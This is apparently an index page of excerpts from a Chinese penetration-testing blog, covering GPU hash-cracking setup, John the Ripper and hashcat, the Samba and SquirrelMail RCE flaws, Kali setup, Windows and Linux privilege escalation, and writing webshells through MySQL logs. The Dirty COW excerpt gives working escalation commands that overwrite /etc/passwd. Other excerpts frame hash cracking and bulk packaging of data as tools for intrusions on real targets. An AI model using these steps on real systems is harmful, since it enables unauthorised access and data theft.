高速GPU Hash破解工作站部署备忘
0x01 首先,购买并组装好所有硬件,插上网线,加电开始测试,仔细观察机器硬件是否都工作正常,确认没问题后,再继续后面的步骤,本次自己用于测试的所有硬件具体型号如下,一套下来三万五左右,说实话这个配置作为GPU破解来讲并不算高 [属于偏下等],如果你不缺钱,完全可以买更好的 ^_^1
2
3
4
5supermicro超微7048GR-TR准系统 双路塔式工作站4 GPU运算服务器 |一台
Intel/英特尔 XEON至强 E5-2620 V3 15M 2.4G 6核12线 |2颗
金士顿 16G DDR4 REG ECC 2133 服务器内存条 |2根
三星(SAMSUNG) 850 PRO 512G SATA3 固态硬盘 |2块
NVIDIA技嘉GTX1070 Founders Edition 8G |4张 32G GPU
0x02 下载安装 ubuntu-14.04.5-desktop-amd64,这里为了方便,可以直接将其做成系统启动U盘进行安装,镜像下载地址如下1
http://releases.ubuntu.com/14.04/ubuntu-14.04.5-desktop-amd64.iso
系统安装完以后还需要进行一些必要的准备工作,首先,全面更新系统1
2
3
4# apt-get update && apt-get upgrade -y
# shutdown -r now 像这样的大规模更新完成后,务必立即重启系统
# apt-get install linux-headers-`uname -r` -y 为了防止下面编译过程中出错,这里我就提前把对应的内核头文件都装上了
# shutdown -r now
快速破解各种散列Hash [ John入门篇 ]
0x00 前言
john[又名JTR] 本身是用来专门破解linux系统用户hash的,但现在已经不再那么局限了,它同样也提供了非常多的散列类型,虽然,跟hashcat在某些方面确实还差了一个量级,但它也有自己很独到的地方,多用你就知道了,废话不多说,咱们开始吧
0x01 尝试在Ubuntu16.04.2 LTS上编译安装john 1.8[当然啦,也有已经编译好对应的win版下的,不过实际破解还是更推荐用linux],像类似的hash破解工具,不用多说,单独找个显卡或者CPU性能好点的机器是必须的,要不,意义何在呢,编译安装的过程就非常简单了,如下[如果嫌手敲的累,自己放脚本里跑跑就好了]1
2
3
4
5
6
7
8
9# wget http://www.openwall.com/john/j/john-1.8.0.tar.xz
# tar xvfJ john-1.8.0.tar.xz
# cd john-1.8.0/src
# make 选择对应的系统平台进行编译
# make clean linux-x86-64
# echo $?
# cd ../run/
# ./john --test 测试当前系统的破解速度
# echo $?
快速破解各种散列Hash [ Hashcat入门篇 ]
0x00 前言
最近恰巧刚搞到一批hash,所以就寻思着,要不顺手小结一点关于hash破解的东西吧,反正经常要用,就当留备忘了,顺便也分享给大家,主要还是希望大家都能在实际渗透中能尽快上手用,既是这样,就肯定不会涉及太深,比如,其内部的破解算法具体是如何实现的等…,我们都不会去深入剖析,毕竟,并不是为了去写此类工具,如果真的有兴趣,可自行去读源码[ 起码自己暂时还没那能力 ]
,经常渗透的朋友可能都非常清楚,由于各种各样的途径,我们经常会搞到各种各样的散列[ hash ]
,比如,各类web管理用户的密码hash,各类系统用户的密码hash,各种第三方服务器工具配置文件中的hash,各类办公套件文件启动密码的加密hash,等…今天,我们就来简要说明一下关于各类hash破解工具的使用,以备不时之需…其实,明眼人都很清楚,hash破解本质是没啥实际技术含量的[ 前提你自己不写此类工具 ]
,还是那句话,主要目的还是希望大家能尽快上手,既然是好东西就要想办法把它应用到实际干活儿中,不然,意义何在呢…废话少说,咱们开始介绍今天的第一款hash破解工具,hashcat
想必该工具早已家喻户晓[ 关于hash破解的东西,后续我会做成一个单独的系列 ]
,希望大家能持续关注,你们的支持,会是自己努力创作的源泉,嘿嘿…
Samba RCE 利用小记 [ CVE-2017-7494 ]
0x01 Samba 远程执行快速利用小结 CVE-2017-7494,至于samba是什么,我就不科普了[说白点儿就是个win和linux机器共享文件的服务,企业里面已经用到烂的东西],直接看过程吧1
漏洞影响Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本
0x02 关于漏洞的简要描述,说的通俗一点就是’允许samba用户上传自己的类库到可读写的samba目录中’所导致的远程执行:1
https://www.samba.org/samba/security/CVE-2017-7494.html
利用目标系统现有工具快速打包目标机器数据
0x01 前言
几乎对所有渗透者来讲,初衷或者最终目的无非就是想对目标实施长期监控,但,具体怎么监控呢[好吧,那又是个非常大的话题,个人能力现在实在有限],无非就是下些各种各样的资料回来[当然,这可能是所有监控里面最朴实无华的一种],今天,我们单就这一点来做些简要说明,事先声明,可以写脚本[有时候确实不太灵活],但大多数脚本的核心可能还是靠这些东西,废话就先到这儿吧,希望下面的内容能帮到你,写的不好,管用就行
0x02 在linux机器下的快速打包方式[下面这些工具一般在目标机器上都会自带]:
利用 tar
,一般在部署系统时默认都会预先装上,其它还有很多其它的压缩工具,但这里就以最常用的为例,只是打包个数据而已,哪个好用用哪个就行了,没必要在这些问题上过于纠结[我们并不是在研究压缩算法]1
2
3
4
5
6
7
8--exclude 排除不打包的文件
-c 创建文件
-v 显示打包过程
-f 指定要打包的文件
-z 压缩
-X 把要排除的文件名事先写到文件中然后指定它就可以排除多个了
-C 解压到指定目录中
-p 打包的时候保持原有文件属性
SquirrelMail < 1.4.23 RCE [CVE-2017-7692]
0x01 环境简介
关于 SquirrelMail 就不用多说了吧[一套开源php 邮件程序][说实话,用这套程序的目标还是蛮多的,尼玛,不说了,都是泪……],在重现漏洞利用之前,我们需要先把邮件服务器简单搭起来,这里以centos 6.8 x86 为例 [为了避免安装过程出问题,iptables和selinux已事先全部关闭],大致的配置过程如下,下面是具体测试环境:1
2
3kali 2017: 执行SquirrelMail_RCE_exploit.sh 利用脚本
centos 6.8 x86: 完全模拟真实的生产环境,lamp全程源码包编译配置[后期会把各种配置细节更新上来]
SquirrelMail版本 1.4.20
Kali 实战渗透环境配置指南
0x01 最近刚好看到kali有更新,想想自己用的系统似乎很久也没更新过了,这里就顺手记录一些关于部署渗透系统的注意事项,留给有需要的朋友做些简单参考
首先,到kali的官网去下载最新版的kali iso镜像或者虚拟机文件个人还是更建议直接用它官方提供的虚拟机
,这里我就直接用它已经配好的虚拟机来做演示说明,也建议大家直接用它官方提供好的虚拟机,不用官方iso镜像是有原因的,以后大家就会明白的,只是不想在部署系统上浪费太多时间1
2https://images.offensive-security.com/virtual-images/Kali-Linux-2017.1-vm-amd64.7z
https://images.offensive-security.com/virtual-images/Kali-Linux-2017.1-vm-i686.7z
0x02 虚拟机下载好以后,解压该虚拟机文件,然后到VMware中选择并打开该虚拟机,root的默认密码是toor,进入系统后,编辑source.list文件,修改为官方提供的apt源,强烈建议这里只保留官网提供的apt源即可,尽量不要用任何第三方源,如果被挂马,概不负责,^_^ 务必谨记1
2# vi /etc/apt/sources.list
deb http://http.kali.org/kali kali-rolling main non-free contrib
Linux 溢出提权小记
1
2
3
4
5
6
7
8'脏牛'[Dirty copy-on-write] 提权小记:
实际渗透中,提的成功率相对来讲还是蛮高的,屡试不爽,废话不多说,祝大家好运吧,至于漏洞细节,请自行参考公告,影响内核版本 Dirty COW.c 2.6.22 < 3.9
$ gcc -pthread dirty.c -o dirty -lcrypt
$ ./dirty admin
$ su firefart
# mv /tmp/passwd.bak /etc/passwd 干完活,一定要记得把东西还原回来,exp已经有相应的msf模块可用,大家请自行尝试
# exit
Windows 溢出提权小记
0x01 前言
平时用的相对比较多,就顺手自己记录了一份,不大完整,关键是大家能用上就好,都是一些已知的windows 0day exp,关于各个漏洞的详情,请自行查阅微软安全公告,链接如下1
https://technet.microsoft.com/zh-cn/library/security/dn639106.aspx
0x02 具体exp利用如下1
2
3
4
5RPCSS服务没有正确地隔离NetworkService或LocalService帐号下运行的进程,导致本地攻击者可以利用令牌劫持的方式获得权限提升
漏洞代号: MS09-012
补丁编号: KB952004
exp 用途: 本地提权
适应平台: 针对03以下系统,菜刀可用
利用Mysql的general Log 写Shell[突破into Outfile]
0x01 前言:
实际渗透过程中,我们很可能会遇到这样的情况,明明是正儿八经的mysql root权限,但实际利用into outfile写shell的时候,却怎么写不进去,可以肯定的前提是,我们对目标的网站目录绝对是有写权限的且mysql的root用户本身并没有被降权,一般出现这样的情况很可能就是因为into outfile被禁用或waf拦截,希望下面的方式能帮到你